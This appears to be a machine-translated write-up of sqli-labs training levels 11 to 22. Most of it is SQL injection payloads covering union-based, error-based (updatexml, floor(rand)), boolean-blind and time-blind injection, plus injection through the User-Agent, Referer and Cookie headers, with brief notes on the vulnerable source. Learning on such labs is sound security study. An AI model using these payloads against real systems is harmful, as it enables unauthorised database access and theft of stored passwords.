Preface:
SQL injection is a safe entry web-based, so you have to carefully learn SQL injection.
From eleven to start off is POST request, this time from the eleventh to do off
Level 11
Try the universal password ' or 1=1#
, there is echo, it seems that single quotes are closed, the capture operation, injected or echo, but from the GET
way into a POST
way.
payload:
判断列数
uname=' order by 1,2,3#
查找数据库
uname=' union select 1,database()#
查表
uname=' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆字段
uname=' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
爆值
uname=' union select 1,group_concat(username,0x3a,password) from users --+
Source analysis:
SQL statements directly in the source code is quoted Clearance closed, and there is no protection, it will have such a problem
12 Off
Double quotes given input discovery information
so that it can be determined easily closed symbols ")
, there would be no change in the other, and the same posture off eleventh
Here is listed a payload :
爆字段
uname=") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
Source code analysis
Source code analysis can be found here, just use $uname='"'.$uname'."'
the input parameters for the closed sign "
, and then spliced to the $sql
statement, I found $uname
there a front (
, so here is stitched closed sign ")
, but only so far, and no other protection.
13 Off
Test '
and found that the error message
by this sentence will be able to determine the sign is closed ')
, the thirteenth off and did not return before the difference is significant, but there is an error message, so it can be injected into an error, the same number of columns or the first judgment, etc.
Explosion database
uname=') union select 1,count(*) from information_schema.columns group by concat(database(),0x3a,floor(rand(0)*2));--+
Explosion Data Sheet
uname=') union select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),0x3a,floor(rand(0)*2))x from information_schema.columns group by x;--+
Explosion field values
uname=') Union select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;--+
Burst value
uname=') Union select count(*),concat((select username from users limit 1,1),0x3a,floor(rand(0)*2))x from information_schema.columns group by x;--+
Source code analysis
Source does not just change the output will not display when the injection is successful, other than a change of ')
a closed sign.
14 Off
Closed symbols a test "
, the same type and thirteenth problem, given the same injection
payload:
uname=1" union select 1,count(*) from information_schema.columns group by concat(database(),0x3a,floor(rand(0)*2));--+
Source code analysis
With the 13th off roughly the same, not much to do to explain
Fifteenth off
When the input uname=1' or 1=1#
, find the page shows success
illustrates the closed sign is '
, this off without being given information and no echo, you can consider Boolean blinds and blinds the time
Boolean blinds
uname=1' or ascii(substr((database()),1,1))>115#&passwd=123&submit=Submit
uname=1' or ascii(substr((database()),1,1))=115#&passwd=123&submit=Submit
Clearance test will be able to find the first character of the database for the S
use of such methods can guess the other characters
Time blinds
uname=1' or if((ascii(substr(database(),1,1)))>100,1,sleep(10))#
Through the use of if
statements and sleep
functions to detect the character ascll
range, if not met, the response will be delayed by 10 seconds in order to guess the name of the database.
Source code analysis
The error message and echo information has been commented out, so only by blind or time to do blind
SQL statements still the same as before, and there is not much change, not much protection
16 Off
Use uname=1") or 1=1#
the test found, show success, the sign is closed “)
, the other no change, and 15 off the same, the same posture, change the symbol to close the payload, not much narrative
17 Off
From the beginning of the 17th off, find the page some changes, there should be a new posture to learn
Construction uname
no results, try passwd
, when entering single quotation marks, found an error message appears, try Xpath error, I found that indeed, it is the following much simpler, direct burst databases, tables, etc.
Explosion database
uname=admin&passwd=1' or updatexml(1,concat(0x7e,database(),0x7e),1)# &submit=Submit
Explosion Data Sheet
uname=admin&passwd=1' or updatexml(1,(select group_concat(table_name) from
information_schema.TABLES where TABLE_SCHEMA=database()),1)# &submit=Submit
Explosion field
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1)#&submit=Submit
Burst value
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select username from users),0x7e),1)#&submit=Submit
Front have no problem, but when the value of the explosion, was found
the next check Baidu, we found:
mysql in You can't specify target table for update in FROM clause
error mean, you can not select a certain value to the same table, and then update the table (in the same statement)
Reference article
Need to add a layer on the outside can be solved select
uname=admin&passwd=' or updatexml(1,concat(0x7e,(select username from (select username
from users)c limit 0,1),0x7e),1)#&submit=Submit
Source code analysis
Simply do not submit uname, no wonder no reaction
18 Off
This time to an IP address, it seems that they can learn a new posture
Guess should be the head first injection, but it is no echo, desperation, the user name and password to enter the blind uname=admin&passwd=123
, found:
this. . . . . You must be able to demonstrate successful landing error message
With the information given, can be given off by Xpath 17
Enter User-Agent: 1'
, find the error message
try User-Agent: 1' or 1=1#
, echoing results:
use User-Agent: 1' or '1'='1
, found echo success, to find a way of closing, you can refer to that payload 17 off
broke database
User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
17 below and off the big bad not bad
Source code analysis
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
There is a sense input function, a simple audit the code
Use substr
function limits the length of, if not all of the digital input mysql_real_escape_string()
function escapes special characters in a string, a single quote to the filter so we follow the conventional methods can not be made, after only the first landing by User-Agent
implanting
19 Off
And eighteenth off similar, but this time the injection point is present in the Referer
test symbols or closed Referer: 1' or '1'='1
, it should still be able use Xpath error
payload:
Referer: 1' or updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
Source code analysis
Other protection code is the same as before, just a little change occurred insert statements
20 Off
After the first question should all be weak password login to be found some of the information, which also need to be off the landing, after landing will be able to view
the COOKIE-related, try to inject packet capture
Cookie: uname=admin'
Try a closed symbols
Cookie: uname=admin' or '1'='1
Or the use of Xpath error
payload :
Cookie: uname=1' or updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
Other gestures just like the one off the same, no longer describes the
Source code analysis
Just set uname
the cookie, there is nothing else that can be analyzed
21 Off
Ethereal found a cookie uname=YWRtaW4
, decoded as admin
prompt or cookie, it is also used on a payload off, base64 encryption can be passed
22 Off
Can be turned into double quotes single quotes, or the same payload, base64 encryption can
payload :
Cookie: uname=MSIgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSBhbmQgIjEiPSIx
to sum up
The first hit here, and learn many new bypass position, continue to learn!